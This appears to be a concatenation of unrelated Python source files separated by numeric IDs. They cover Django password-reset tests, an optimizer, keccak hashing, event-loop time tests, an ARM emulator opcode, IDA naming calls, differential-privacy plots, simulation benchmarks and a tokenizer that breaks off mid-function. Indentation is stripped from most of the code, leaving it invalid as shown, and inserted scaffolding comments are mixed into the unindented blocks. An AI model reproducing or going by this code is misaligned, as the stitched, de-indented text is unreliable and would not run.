self.assertIn('_auth_user_id', self.client.session)
self.assertEqual(
int(self.client.session['_auth_user_id']), self.user.pk)
def test_reset_with_password_mismatch(self):
reset_link = self.submit_and_get_reset_link()
# Navigate to the reset link.
response = self.client.get(reset_link, follow=True)
self.assertTemplateUsed(
response, 'registration/password_reset_confirm.html')
reset_redirect_url = response.wsgi_request.path
# Submit the password reset form with a password mismatch.
response = self.client.post(
reset_redirect_url,
dict(
new_password1='<PASSWORD>',
new_password2='<PASSWORD>',
),
follow=True,
)
self.assertTemplateUsed(
response, 'registration/password_reset_confirm.html')
self.assertContains(
response,
escape("The two password fields didn't match."))
# Check that the password has not changed.
self.client.logout()
self.client.login(username='sampleUsername', password='<PASSWORD>')
self.assertIn('_auth_user_id', self.client.session)
self.assertEqual(
int(self.client.session['_auth_user_id']), self.user.pk)
def test_reset_with_invalid_password(self):
reset_link = self.submit_and_get_reset_link()
# Navigate to the reset link.
response = self.client.get(reset_link, follow=True)
self.assertTemplateUsed(
response, 'registration/password_reset_confirm.html')
reset_redirect_url = response.wsgi_request.path
# Submit the password reset form with an invalid password.
response = self.client.post(
reset_redirect_url,
dict(
new_password1='<PASSWORD>',
new_password2='<PASSWORD>',
),
follow=True,
)
self.assertTemplateUsed(
response, 'registration/password_reset_confirm.html')
self.assertContains(
response,
"This password is too short. It must contain at least"
" 10 characters.")
# Check that the password has not changed.
self.client.logout()
self.client.login(username='sampleUsername', password='<PASSWORD>')
self.assertIn('_auth_user_id', self.client.session)
self.assertEqual(
int(self.client.session['_auth_user_id']), self.user.pk)
|
116986
|
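# Hedged scaffolding so this fragment is self-contained: `torch` was not
# imported in the original fragment and the GradientDescent base class lives
# elsewhere in the original project, so a minimal stand-in is sketched here.
import torch
class GradientDescent:
    def __init__(self, params, lr=0.1):
        self.params = list(params)
        self.lr = lr
    def zero_grad(self):
        for param in self.params:
            if param.grad is not None:
                param.grad.zero_()
    def step(self):
        with torch.no_grad():
            for param in self.params:
                param -= self.lr * param.grad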
class MomentumGradientDescent(GradientDescent):
def __init__(self, params, lr=0.1, momentum=.9):
super(MomentumGradientDescent, self).__init__(params, lr)
self.momentum = momentum
        # use self.params (stored by the base class) so that a generator
        # passed as `params` is not consumed twice
        self.velocities = [torch.zeros_like(param, requires_grad=False)
                           for param in self.params]
def step(self):
with torch.no_grad():
for i, (param, velocity) in enumerate(zip(self.params,
self.velocities)):
velocity = self.momentum * velocity + param.grad
param -= self.lr * velocity
self.velocities[i] = velocity
|
116992
|
from __future__ import annotations
import typing
from typing_extensions import Literal
from ctc import spec
from . import formats
@typing.overload
def keccak(
data: spec.BinaryInteger,
output_format: Literal['integer'],
library: typing.Optional[typing.Literal['pysha3', 'pycryptodome']] = None,
) -> int:
...
@typing.overload
def keccak(
data: spec.BinaryInteger,
output_format: Literal['binary'],
library: typing.Optional[typing.Literal['pysha3', 'pycryptodome']] = None,
) -> bytes:
...
@typing.overload
def keccak(
data: spec.BinaryInteger,
output_format: Literal['prefix_hex', 'raw_hex', None] = 'prefix_hex',
library: typing.Optional[typing.Literal['pysha3', 'pycryptodome']] = None,
) -> str:
...
def keccak(
data: spec.BinaryInteger,
output_format: typing.Optional[spec.BinaryFormat] = 'prefix_hex',
library: typing.Optional[typing.Literal['pysha3', 'pycryptodome']] = None,
) -> spec.BinaryInteger:
"""return keccack-256 hash of hex or binary data"""
# determine library
if library is None:
try:
import sha3 # type: ignore
library = 'pysha3'
except ImportError:
library = 'pycryptodome'
# convert data to binary
data = formats.convert(data, 'binary')
if library == 'pysha3':
import sha3 # type: ignore
binary = sha3.keccak_256(data).digest()
elif library == 'pycryptodome':
from Crypto.Hash import keccak as f_keccak
binary = f_keccak.new(digest_bits=256, data=data).digest()
else:
raise Exception(
'must choose valid library, either \'pysha3\' or \'pycryptodome\''
)
return formats.convert(binary, output_format)
@typing.overload
def keccak_text(
text: typing.Union[str, bytes],
output_format: Literal['integer'],
library: typing.Optional[typing.Literal['pysha3', 'pycryptodome']] = None,
) -> int:
...
@typing.overload
def keccak_text(
text: typing.Union[str, bytes],
output_format: Literal['binary'],
library: typing.Optional[typing.Literal['pysha3', 'pycryptodome']] = None,
) -> bytes:
...
@typing.overload
def keccak_text(
text: typing.Union[str, bytes],
output_format: Literal['prefix_hex', 'raw_hex'] = 'prefix_hex',
library: typing.Optional[typing.Literal['pysha3', 'pycryptodome']] = None,
) -> str:
...
def keccak_text(
text: typing.Union[str, bytes],
output_format: spec.BinaryFormat = 'prefix_hex',
library: typing.Optional[typing.Literal['pysha3', 'pycryptodome']] = None,
) -> spec.BinaryInteger:
"""return keccack-256 hash of text"""
if isinstance(text, str):
text = text.encode()
return keccak(text, output_format=output_format, library=library)
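# Hedged usage sketch: the expected digest below is the well-known keccak-256
# of the empty string; 'prefix_hex' output is assumed to carry the '0x' prefix.
# Runs only where this module's package imports resolve.
if __name__ == '__main__':
    digest = keccak_text('', output_format='prefix_hex')
    assert digest == (
        '0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470'
    )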
|
116996
|
import looptime
def test_time_proxy_math():
proxy = looptime.LoopTimeProxy(looptime.new_event_loop(start=123.456))
assert str(proxy) == '123.456'
assert int(proxy) == 123
assert float(proxy) == 123.456
assert proxy == 123.456
assert not proxy == 456.123
assert proxy != 456.123
assert not proxy != 123.456
assert proxy > 122
assert proxy < 124
assert proxy >= 122
assert proxy <= 124
assert not proxy < 122
assert not proxy > 124
assert not proxy <= 122
assert not proxy >= 124
assert not proxy > 123.456
assert not proxy < 123.456
assert proxy >= 123.456
assert proxy <= 123.456
assert proxy + 1.2 == 124.656
assert proxy - 1.2 == 122.256
assert proxy * 1.2 == 148.1472
# The following values cause floating point precision errors if not adjusted:
# 123.456 / 1.2 => 102.88000000000001
# 123.456 % 1.2 => 1.0560000000000076
# We also test for floating point resolution here:
assert proxy / 1.2 == 102.88
assert proxy // 1.2 == 102.0
assert proxy % 1.2 == 1.056
assert round(proxy ** 1.2, 6) == 323.455576 # approximately
def test_resolution_ignores_extra_precision():
proxy = looptime.LoopTimeProxy(looptime.new_event_loop(start=123.456789), resolution=.001)
assert str(proxy) == '123.457'
assert int(proxy) == 123
assert float(proxy) == 123.457
assert proxy == 123.457
assert proxy == 123.457111
assert proxy == 123.456999
# assume that other operations use the same rounding logic.
def test_loop_attachment():
loop1 = looptime.new_event_loop(start=123.456)
loop2 = looptime.new_event_loop(start=456.123)
proxy = looptime.LoopTimeProxy(loop1)
assert proxy == 123.456
assert proxy @ loop1 == 123.456
assert proxy @ loop2 == 456.123
|
117033
|
from armulator.armv6.opcodes.abstract_opcodes.ubfx import Ubfx
from armulator.armv6.opcodes.opcode import Opcode
class UbfxT1(Ubfx, Opcode):
def __init__(self, instruction, lsbit, widthminus1, d, n):
Opcode.__init__(self, instruction)
Ubfx.__init__(self, lsbit, widthminus1, d, n)
def is_pc_changing_opcode(self):
return False
@staticmethod
def from_bitarray(instr, processor):
widthm1 = instr[27:32]
imm2 = instr[24:26]
rd = instr[20:24]
imm3 = instr[17:20]
rn = instr[12:16]
lsbit = (imm3 + imm2).uint
if rd.uint in (13, 15) or rn.uint in (13, 15):
print "unpredictable"
else:
return UbfxT1(instr, **{"lsbit": lsbit, "widthminus1": widthm1.uint, "d": rd.uint, "n": rn.uint})
|
117057
|
from aydin.util.misc.combinatorics import closest_product
def test_closest_product():
u = [1, 2, 5, 7, 9, 10]
N = 15
result = closest_product(u, N)
print(f"closest_product({u}, {N}) = {result}")
assert result == [1, 3]
N = 27
result = closest_product(u, N)
print(f"closest_product({u}, {N}) = {result}")
assert result is None
|
117066
|
import dnacauldron as dc
repository = dc.SequenceRepository()
repository.import_records(files=["gibson_sequences.fa"])
assembly_plan = dc.AssemblyPlan.from_spreadsheet(
assembly_class=dc.GibsonAssembly, path="gibson_assembly.csv"
)
plan_simulation = assembly_plan.simulate(sequence_repository=repository)
print("Assembly stats:", plan_simulation.compute_stats())
report_writer = dc.AssemblyReportWriter(
include_mix_graphs=True,
include_assembly_plots=True,
show_overhangs_in_graph=True,
annotate_parts_homologies=True,
)
plan_simulation.write_report(
target="output", assembly_report_writer=report_writer
)
|
117089
|
from typing import Optional, Dict, TYPE_CHECKING
from algorithms.configuration.entities.agent import Agent
from algorithms.configuration.entities.entity import Entity
from algorithms.configuration.entities.extended_wall import ExtendedWall
from algorithms.configuration.entities.goal import Goal
from algorithms.configuration.entities.obstacle import Obstacle
from algorithms.configuration.entities.trace import Trace
from algorithms.configuration.maps.map import Map
from simulator.services.services import Services
from simulator.views.map.display.map_display import MapDisplay
from simulator.views.map.data.voxel_map import VoxelMap
from structures import DynamicColour, Colour, Point
if TYPE_CHECKING:
from simulator.views.map.map_view import MapView
class EntitiesMapDisplay(MapDisplay):
__cube_colours: Dict[Point, Colour]
__agent_colour: DynamicColour
__trace_colour: DynamicColour
__goal_colour: DynamicColour
def __init__(self, services: Services, z_index=100, custom_map: Map = None) -> None:
super().__init__(services, z_index=z_index, custom_map=custom_map)
self.__agent_colour = self._services.state.views.effective_view.colours[VoxelMap.AGENT]
self.__trace_colour = self._services.state.views.effective_view.colours[VoxelMap.TRACE]
self.__goal_colour = self._services.state.views.effective_view.colours[VoxelMap.GOAL]
self.__cube_colours = {}
self.updates_cubes = True
def render(self, *discarded) -> None:
rv = self.get_renderer_view()
for p in self.__cube_colours:
rv.cube_requires_update(p)
self.__cube_colours.clear()
p3 = rv.to_point3
self.__cube_colours[p3(self._map.agent)] = self.__agent_colour()
self.__cube_colours[p3(self._map.goal)] = self.__goal_colour()
tc = self.__trace_colour()
for trace_point in self._map.trace:
self.__cube_colours[p3(trace_point)] = tc
if len(self._map.trace) >= 1:
self.__cube_colours[p3(Entity(self._map.trace[0].position, self._map.agent.radius))] = self.__agent_colour()
for p in self.__cube_colours:
rv.cube_requires_update(p)
def update_cube(self, p: Point) -> None:
if p in self.__cube_colours:
self.get_renderer_view().colour_cube(self.__cube_colours[p])
def request_update_all_cubes(self) -> None:
rv = self.get_renderer_view()
for p in self.__cube_colours:
rv.cube_requires_update(p)
|
117170
|
import esphome.codegen as cg
import esphome.config_validation as cv
from esphome import pins
from esphome.components import sensor
from esphome.const import (
CONF_ID,
CONF_CLOCK_PIN,
CONF_DATA_PIN,
CONF_CO2,
CONF_TEMPERATURE,
CONF_HUMIDITY,
DEVICE_CLASS_CARBON_DIOXIDE,
DEVICE_CLASS_HUMIDITY,
DEVICE_CLASS_TEMPERATURE,
STATE_CLASS_MEASUREMENT,
UNIT_PARTS_PER_MILLION,
UNIT_CELSIUS,
UNIT_PERCENT,
ICON_MOLECULE_CO2,
)
from esphome.cpp_helpers import gpio_pin_expression
zyaura_ns = cg.esphome_ns.namespace("zyaura")
ZyAuraSensor = zyaura_ns.class_("ZyAuraSensor", cg.PollingComponent)
CONFIG_SCHEMA = cv.Schema(
{
cv.GenerateID(): cv.declare_id(ZyAuraSensor),
cv.Required(CONF_CLOCK_PIN): cv.All(pins.internal_gpio_input_pin_schema),
cv.Required(CONF_DATA_PIN): cv.All(pins.internal_gpio_input_pin_schema),
cv.Optional(CONF_CO2): sensor.sensor_schema(
unit_of_measurement=UNIT_PARTS_PER_MILLION,
icon=ICON_MOLECULE_CO2,
accuracy_decimals=0,
device_class=DEVICE_CLASS_CARBON_DIOXIDE,
state_class=STATE_CLASS_MEASUREMENT,
),
cv.Optional(CONF_TEMPERATURE): sensor.sensor_schema(
unit_of_measurement=UNIT_CELSIUS,
accuracy_decimals=1,
device_class=DEVICE_CLASS_TEMPERATURE,
state_class=STATE_CLASS_MEASUREMENT,
),
cv.Optional(CONF_HUMIDITY): sensor.sensor_schema(
unit_of_measurement=UNIT_PERCENT,
accuracy_decimals=1,
device_class=DEVICE_CLASS_HUMIDITY,
state_class=STATE_CLASS_MEASUREMENT,
),
}
).extend(cv.polling_component_schema("60s"))
async def to_code(config):
var = cg.new_Pvariable(config[CONF_ID])
await cg.register_component(var, config)
pin_clock = await gpio_pin_expression(config[CONF_CLOCK_PIN])
cg.add(var.set_pin_clock(pin_clock))
pin_data = await gpio_pin_expression(config[CONF_DATA_PIN])
cg.add(var.set_pin_data(pin_data))
if CONF_CO2 in config:
sens = await sensor.new_sensor(config[CONF_CO2])
cg.add(var.set_co2_sensor(sens))
if CONF_TEMPERATURE in config:
sens = await sensor.new_sensor(config[CONF_TEMPERATURE])
cg.add(var.set_temperature_sensor(sens))
if CONF_HUMIDITY in config:
sens = await sensor.new_sensor(config[CONF_HUMIDITY])
cg.add(var.set_humidity_sensor(sens))
|
117173
|
import pytest
from basic_shopify_api import Options
def test_options_version():
opts = Options()
opts.version = "unstable"
assert opts.version == "unstable"
def test_options_failed_version():
with pytest.raises(ValueError):
opts = Options()
opts.version = "oops"
def test_options_type():
opts = Options()
# Public test
opts.mode = "public"
assert opts.mode == "public"
assert opts.is_public is True
assert opts.is_private is False
# Private test
opts.mode = "private"
assert opts.mode == "private"
assert opts.is_public is False
assert opts.is_private is True
def test_options_failed_type():
with pytest.raises(ValueError):
opts = Options()
opts.mode = "oops"
|
117198
|
import logging
from testplan import test_plan
from testplan.report import Status
from testplan.report.testing.styles import Style, StyleEnum
from testplan.testing.base import ASSERTION_INDENT
from testplan.testing.multitest import MultiTest, testsuite, testcase
from testplan.testing.multitest.logging import (
CaptureLevel,
LogCaptureMixin,
AutoLogCaptureMixin,
)
@testsuite
class LoggingSuite(LogCaptureMixin):
"""
Demonstrate how logging can added to testcase and possibly captured in the result from test suite.
Add LogCaptureMixin and self.logger will be available for logging. self.capture_log(result) can be
used as a context manager to capture log in the result. It is possible to format the log as needed,
and also to attach the captured log as a file.
The log can be captured at 3 leveles, -TESTSUITE: only the logs logged through self.logger will be captured,
-TESTPLAN: all testplan related loggs captured (so drivers logs will be included as well), -ROOT: all logs
will be captured at the level the root logger is set normally WARNING
"""
@testcase
def testsuite_level(self, env, result):
        with self.capture_log(
            result
        ) as logger:  # as a convenience the logger is returned, but it is really the same as self.logger
logger.info("Hello")
self.logger.info("Logged as well")
self.logger.parent.info("Not captured")
logging.getLogger().warning("Not captured either")
@testcase
def testplan_level(self, env, result):
with self.capture_log(
result, capture_level=CaptureLevel.TESTPLAN
) as logger:
logger.info("Hello")
self.logger.info("Logged as well")
self.logger.parent.info("Now captured")
logging.getLogger().warning("Not captured either")
@testcase
def root_level(self, env, result):
with self.capture_log(
result, capture_level=CaptureLevel.ROOT
) as logger:
logger.info("Hello")
self.logger.info("Logged as well")
self.logger.parent.info("Now captured")
logging.getLogger().warning("This captured too")
@testcase
def attach(self, env, result):
with self.capture_log(result, attach_log=True) as logger:
logger.info("Attached Log")
@testcase
def format(self, env, result):
with self.capture_log(
result,
format="%(asctime)-24s %(name)-50s %(levelname)-15s %(message)s",
) as logger:
logger.info("Formatted")
@testcase
def multiple(self, env, result):
with self.capture_log(result):
self.logger.info("CaptureGroup 1")
self.logger.error(
"To have some color"
) # This level goes to stdout too
# do an assertion to separate the blocks
result.true(True, "This is so true")
with self.capture_log(result):
self.logger.info("CaptureGroup 2")
self.logger.warning(
"To have some color"
) # This level goes to stdout too
@testcase
def specials(self, env, result):
with self.capture_log(result):
self.logger.test_info("Test info log: goes to the console as well")
self.logger.log_test_status(
"A mandatory check", Status.PASSED, indent=ASSERTION_INDENT
)
@testsuite
class AutoLoggingSuite(AutoLogCaptureMixin):
"""
    AutoLogCaptureMixin will automatically add the captured log at the end of every testcase
"""
@testcase
def case(self, env, result):
self.logger.info("Hello")
@testcase
def case2(self, env, result):
self.logger.info("Do it for all the testcases")
@testsuite
class AutoLoggingSuiteThatAttach(AutoLogCaptureMixin):
def __init__(self):
super(AutoLoggingSuiteThatAttach, self).__init__()
self.log_capture_config.attach_log = True
@testcase
def case(self, env, result):
self.logger.info("Hello Attached")
@testsuite
class AutoLoggingSuiteThatFormat(AutoLogCaptureMixin):
def __init__(self):
super(AutoLoggingSuiteThatFormat, self).__init__()
self.log_capture_config.format = (
"%(asctime)-24s %(name)-50s %(levelname)-15s %(message)s"
)
@testcase
def case(self, env, result):
self.logger.info("Hello Formatted")
@test_plan(
name="Logging",
pdf_path="report.pdf",
pdf_style=Style(
passing=StyleEnum.ASSERTION_DETAIL, failing=StyleEnum.ASSERTION_DETAIL
),
)
def main(plan):
plan.add(
MultiTest(
name="Logging",
suites=[
LoggingSuite(),
AutoLoggingSuite(),
AutoLoggingSuiteThatAttach(),
AutoLoggingSuiteThatFormat(),
],
)
)
if __name__ == "__main__":
main()
|
117206
|
set_name(0x800A2AB8, "VID_OpenModule__Fv", SN_NOWARN)
set_name(0x800A2B78, "InitScreens__Fv", SN_NOWARN)
set_name(0x800A2C68, "MEM_SetupMem__Fv", SN_NOWARN)
set_name(0x800A2C94, "SetupWorkRam__Fv", SN_NOWARN)
set_name(0x800A2D24, "SYSI_Init__Fv", SN_NOWARN)
set_name(0x800A2E30, "GM_Open__Fv", SN_NOWARN)
set_name(0x800A2E54, "PA_Open__Fv", SN_NOWARN)
set_name(0x800A2E8C, "PAD_Open__Fv", SN_NOWARN)
set_name(0x800A2ED0, "OVR_Open__Fv", SN_NOWARN)
set_name(0x800A2EF0, "SCR_Open__Fv", SN_NOWARN)
set_name(0x800A2F20, "DEC_Open__Fv", SN_NOWARN)
set_name(0x800A3194, "GetVersionString__FPc", SN_NOWARN)
set_name(0x800A3268, "GetWord__FPc", SN_NOWARN)
set_name(0x800A2F44, "StrDate", SN_NOWARN)
set_name(0x800A2F50, "StrTime", SN_NOWARN)
set_name(0x800A2F5C, "Words", SN_NOWARN)
set_name(0x800A3134, "MonDays", SN_NOWARN)
|
117226
|
from autodp.mechanism_zoo import PureDP_Mechanism
from autodp.transformer_zoo import Composition
# Example: pure DP mechanism and composition of it
eps = 0.3
mech = PureDP_Mechanism(eps, name='Laplace')
import matplotlib.pyplot as plt
fpr_list, fnr_list = mech.plot_fDP()
plt.figure(1)
plt.plot(fpr_list,fnr_list,label='fdp_of_laplace')
delta = 1e-6
epslist = [mech.get_approxDP(delta)]
# declare a transformation to handle composition
compose = Composition()
for i in range(2,11):
mech_composed = compose([mech], [i])
epslist.append(mech_composed.get_approxDP(delta))
fpr_list, fnr_list = mech_composed.plot_fDP()
plt.plot(fpr_list, fnr_list, label='fdp_of_'+str(i)+'laplace')
plt.legend()
plt.xlabel('Type I error')
plt.ylabel('Type II error')
plt.show()
# we could specify parameters of the composition, e.g. using RDP composition, using KOV and so on
plt.figure(2)
plt.plot(range(1,11),epslist)
plt.xlabel('number of times compose')
plt.ylabel(r'$\epsilon$ at $\delta = 1e-6$')
plt.show()
|
117244
|
import torch
def sample_laplace_noise(loc, scale, shape, dtype, device):
'''
https://github.com/pytorch/pytorch/blob/6911ce19d7fcf06e7af241e6494b23acdc320dc4/torch/distributions/laplace.py
'''
finfo = torch.finfo(dtype)
u = torch.zeros(shape, dtype=dtype, device=device).uniform_(finfo.eps - 1, 1)
return loc - scale * u.sign() * torch.log1p(-u.abs())
def sample_unit_laplace_noise(shape, dtype, device):
return sample_laplace_noise(0., 1., shape, dtype, device)
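# Minimal usage sketch: draw standard Laplace noise on the CPU and check its
# spread empirically (for Laplace(0, 1) the variance is 2 * scale**2 = 2).
# noise = sample_unit_laplace_noise((100000,), torch.float32, torch.device("cpu"))
# print(noise.mean().item(), noise.var().item())  # ~0.0, ~2.0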
|
117270
|
import numpy as np
import time
import md_simple
import md_nnps
from compyle.config import get_config
def solve(n, backend, solver_algo, tf=0.5, dt=0.02, use_count_sort=False):
solver = solver_algo(n, backend=backend.replace("_omp", ""))
start = time.time()
solver.solve(tf, dt)
end = time.time()
print("Time taken for backend = %s, N = %i is %g secs" %
(backend, n, (end - start)))
return end - start
def compare(backends, n_list, solver_algo, niter=3):
t_list = {b: [] for b in backends}
speedups = {b: [] for b in backends}
for n in n_list:
print("Running for N = %i" % n)
for backend in backends:
if "omp" in backend:
get_config().use_openmp = True
t = 1e9
for it in range(niter):
t = min(t, solve(n, backend, solver_algo))
t_list[backend].append(t)
if "omp" in backend:
get_config().use_openmp = False
if 'cython' in backends:
for backend in backends:
for i, n in enumerate(n_list):
speedups[backend].append(
t_list["cython"][i] / t_list[backend][i])
else:
speedups = None
return speedups, t_list
def compare_implementations(backend, n_list, niter=3):
import matplotlib.pyplot as plt
sp, nnps_tlist = compare([backend], n_list,
md_nnps.MDSolver, niter=niter)
sp, simple_tlist = compare([backend], n_list,
md_simple.MDSolver, niter=niter)
speedup = [simple_tlist[backend][i] / nnps_tlist[backend][i]
for i in range(len(n_list))]
plt.loglog(n_list, nnps_tlist[backend], 'x-', label="Linear")
plt.loglog(n_list, simple_tlist[backend], 'x-', label="Simple")
plt.xlabel("Number of particles")
plt.ylabel("Time (secs)")
plt.legend()
plt.grid(True)
plt.savefig("time_comp_impl.png", dpi=300)
plt.clf()
plt.loglog(n_list, speedup, 'x-')
plt.xlabel("Number of particles")
plt.ylabel("Speedup")
plt.grid(True)
plt.savefig("speedup_comp_impl.png", dpi=300)
def plot(n_list, speedups, t_list, label):
backend_label_map = {'cython': 'Cython', 'cython_omp': 'OpenMP',
'opencl': 'OpenCL', 'cuda': 'CUDA'}
import matplotlib.pyplot as plt
plt.figure()
if speedups:
for backend, arr in speedups.items():
if backend == "cython":
continue
plt.semilogx(n_list, arr, 'x-', label=backend_label_map[backend])
plt.xlabel("Number of particles")
plt.ylabel("Speedup")
plt.legend()
plt.grid(True)
plt.savefig("%s_speedup_%s.png" %
(label, "_".join(speedups.keys())), dpi=300)
plt.clf()
for backend, arr in t_list.items():
plt.loglog(n_list, arr, 'x-', label=backend_label_map[backend])
plt.xlabel("Number of particles")
plt.ylabel("Time (secs)")
plt.legend()
plt.grid(True)
plt.savefig("%s_time_%s.png" % (label, "_".join(t_list.keys())), dpi=300)
if __name__ == "__main__":
from argparse import ArgumentParser
p = ArgumentParser()
p.add_argument(
'-c', '--comparison', action='store', dest='comp', default='gpu_comp',
choices=['gpu_comp', 'omp_comp', 'comp_algo'],
help='Choose the comparison.'
)
p.add_argument(
'--nnps', action='store', dest='nnps', default='linear',
choices=['linear', 'simple'],
help='Choose algorithm.'
)
p.add_argument(
'--use-double', action='store_true', dest='use_double',
default=False, help='Use double precision on the GPU.'
)
o = p.parse_args()
get_config().use_double = o.use_double
solver_algo = (md_nnps.MDNNPSSolver if o.nnps == 'linear'
else md_simple.MDSolver)
n_list = [10000 * (2 ** i) for i in range(10)] if o.nnps == 'linear' else \
[500 * (2 ** i) for i in range(8)]
if o.comp == "gpu_comp":
backends = ["opencl", "cuda", "cython"]
print("Running for", n_list)
speedups, t_list = compare(backends, n_list, solver_algo)
plot(n_list, speedups, t_list, o.nnps)
elif o.comp == "omp_comp":
backends = ["cython_omp", "cython"]
print("Running for", n_list)
speedups, t_list = compare(backends, n_list, solver_algo)
plot(n_list, speedups, t_list, o.nnps)
elif o.comp == "comp_algo":
backend = "cython"
n_list = [500, 1000, 2000, 4000, 8000, 16000, 32000]
print("Running for", n_list)
compare_implementations(backend, n_list)
|
117271
|
import pytest
from decimal import Decimal
from importer.page_importer import PageImporter
from pages.event_page.models import EventPage
import pages.event_page.fixtures as fixtures
from pages.event_page.factories import EventPageFactory
import pages.event_page.fixtures.helpers.components as components
@pytest.mark.django_db
def test_create_event_page_with_title():
page = fixtures.title()
assert isinstance(page, EventPage)
assert page.title == "Event page with title"
assert page.slug == "Event-page-with-title"
# If Event page has janis url
@pytest.mark.django_db
def test_event_page_with_urls(home_page, expected_publish_url_base):
janis_url_page_type = 'event'
page = EventPageFactory.create(
slug="page_slug",
coa_global=False,
parent=home_page,
date="2020-9-29"
)
# Set expected urls using janis url page type and Event page year, month, day and slug
expected_urls = ['/{page_type}/{page_year}/{page_month}/{page_day}/{page_slug}'.format(
page_type=janis_url_page_type,
page_year=page.date.year,
page_month=page.date.month,
page_day=page.date.day,
page_slug=page.slug)]
urls = page.janis_urls()
janis_publish_url = page.janis_publish_url()
# we should get a url under every Event
assert urls == expected_urls
assert janis_publish_url == f'{expected_publish_url_base}{expected_urls[0]}'
# If Event page has only a title
# it should have no urls
@pytest.mark.django_db
def test_event_page_with_no_urls():
page = fixtures.title()
urls = page.janis_urls()
janis_publish_url = page.janis_publish_url()
assert urls == []
assert janis_publish_url == '#'
@pytest.mark.django_db
def test_create_event_page_with_city_location():
page = fixtures.at_city_location()
assert isinstance(page, EventPage)
assert page.title == "Event at city location"
assert page.slug == "event-at-city-location"
# Add autogenerated streamfield "id" to expected value
expected_location_blocks = components.city_location_block()
expected_location_blocks[0]["id"] = page.location_blocks.stream_data[0]["id"]
assert page.location_blocks.stream_data == expected_location_blocks
# @pytest.mark.django_db
@pytest.mark.skip("importer test")
def test_import_event_page_with_city_location(remote_staging_preview_url, test_api_url, test_api_jwt_token):
url = f'{remote_staging_preview_url}/event/UGFnZVJldmlzaW9uTm9kZTo0NA==?CMS_API={test_api_url}'
page = PageImporter(url, test_api_jwt_token).fetch_page_data().create_page()
assert isinstance(page, EventPage)
assert type(page.location_blocks.stream_data[0]['value']['location_page']) == int
@pytest.mark.django_db
def test_create_event_page_with_remote_location():
page = fixtures.at_remote_location()
assert isinstance(page, EventPage)
assert page.title == "Event at remote location"
assert page.slug == "event-at-remote-location"
# Add autogenerated streamfield "id" to expected value
expected_location_blocks = components.remote_location_block()
expected_location_blocks[0]["id"] = page.location_blocks.stream_data[0]["id"]
assert page.location_blocks.stream_data == expected_location_blocks
# @pytest.mark.django_db
@pytest.mark.skip("importer test")
def test_import_event_page_with_remote_location(remote_staging_preview_url, test_api_url, test_api_jwt_token):
url = f'{remote_staging_preview_url}/event/UGFnZVJldmlzaW9uTm9kZTo0Ng==?CMS_API={test_api_url}'
page = PageImporter(url, test_api_jwt_token).fetch_page_data().create_page()
assert isinstance(page, EventPage)
# Remove autogenerated "id" to see if the rest of stream_data matches
del page.location_blocks.stream_data[0]["id"]
assert page.location_blocks.stream_data == [{
'type': 'remote_location',
'value': {
'additional_details_ar': '',
'additional_details_en': '3rd floor conference room',
'additional_details_es': '',
'additional_details_vi': '',
'city': 'Austin',
'name_ar': '',
'name_en': 'Faulk',
'name_es': '',
'name_vi': '',
'state': 'TX',
'street': '800 Guadalupe',
'unit': '5',
'zip': '78701'
}
}]
@pytest.mark.django_db
def test_create_event_page_with_fees():
page = fixtures.three_fees()
assert isinstance(page, EventPage)
assert page.title == "Event with fees"
assert page.slug == "event-with-fees"
# Add autogenerated streamfield "id" to expected value
expected_fees = components.three_fees
for expected_fee in expected_fees:
actual_fee = page.fees.get(fee_label=expected_fee['fee_label'])
assert actual_fee.fee_label == expected_fee['fee_label']
assert actual_fee.fee == Decimal(expected_fee['fee'])
@pytest.mark.skip("importer test")
def test_import_event_page_with_fees(remote_staging_preview_url, test_api_url, test_api_jwt_token):
url = f'{remote_staging_preview_url}/event/UGFnZVJldmlzaW9uTm9kZTo3Nw==?CMS_API={test_api_url}'
page = PageImporter(url, test_api_jwt_token).fetch_page_data().create_page()
assert isinstance(page, EventPage)
expected_fees = components.three_fees
for expected_fee in expected_fees:
actual_fee = page.fees.get(fee_label=expected_fee['fee_label'])
assert actual_fee.fee_label == expected_fee['fee_label']
assert actual_fee.fee == Decimal(expected_fee['fee'])
|
117291
|
from .utils import default_init_weights
from .cost_volume import compute_cost_volume, add_H_W_Padding
from .weightnet import WeightNet, WeightNet_DW
from .frn import FilterResponseNorm2d
from .bam import BAM
from .coordi_attention import CoordAtt
from .shuffle import ShuffleV2Block
from .net import MobileNeXt
from .net import ResBlocks
|
117294
|
from leapp.models import Model, fields
from leapp.topics import SystemInfoTopic
class NtpMigrationDecision(Model):
topic = SystemInfoTopic
migrate_services = fields.List(fields.String())
config_tgz64 = fields.String()
|
117305
|
from json import load, dumps
from .utils import populate_ast
class TokenStream(object):
def __init__(self, input_):
self.input = input_
self.current = None
self.keywords = 'if then else true false'.split()
self.datatypes = ['U0', 'U8', 'U16', 'U32', 'U64',
'I8', 'I16', 'I32', 'I64', 'F64']
self.tokens = list()
self.direct_trans = {
'Print': 'printf',
'U0': 'void',
'U8': 'unsigned char',
'U16': 'unsigned short',
'U32': 'unsigned int',
'U64': 'unsigned long',
'I8': 'char',
'I16': 'short',
'I32': 'int',
'I64': 'long',
'F64': 'double'
}
def croak(self, message):
return self.input.croak(message + f'{dumps(self.tokens, indent=2)}')
def is_keyword(self, word):
return word in self.keywords
def is_datatype(self, word):
return word in self.datatypes
def is_digit(self, ch):
try:
int(ch)
return True
except (ValueError, TypeError):
return False
def is_id_start(self, ch):
try:
return ch.isalpha()
except AttributeError:
return False
def is_id(self, ch):
return self.is_id_start(ch) or ch in '?!-<>=0123456789'
def is_op_char(self, ch):
return ch in '+-*/%=&|<>!'
def is_punc(self, ch):
return ch in ',;(){}[]'
def is_whitespace(self, ch):
return ch in ' _\t_\n'.split('_')
def is_being_declared(self):
return self.tokens and self.tokens[-1].get('type') != 'datatype'
def is_not_builtin(self, id_):
return id_ not in self.direct_trans
def read_while(self, predicate):
string = str()
while not self.input.eof() and predicate(self.input.peek()):
string += self.input.next()
return string
def read_while_prev(self, predicate):
string = str()
line = self.input.line
col = self.input.col
while not self.input.bof() and predicate(self.input.peek_prev()):
string += self.input.prev()
self.input.line = line
self.input.col = col
return string[::-1]
    def read_number(self):
        has_dot = [False]  # a list so the nested predicate can mutate it
        def anon(ch):
            if ch == '.':
                if has_dot[0]:
                    return False
                has_dot[0] = True
                return True
            return self.is_digit(ch)
        number = self.read_while(anon)
try:
number = int(number)
except ValueError:
number = float(number)
self.tokens.append({
'type': 'num',
'value': number
})
return self.tokens[-1]
def read_function(self, name, prog, type_=['int']):
coord = f'{self.input.filename}:{self.input.line}'
return populate_ast(self, 'funcdef', **{
'coord': coord,
'body.coord': coord,
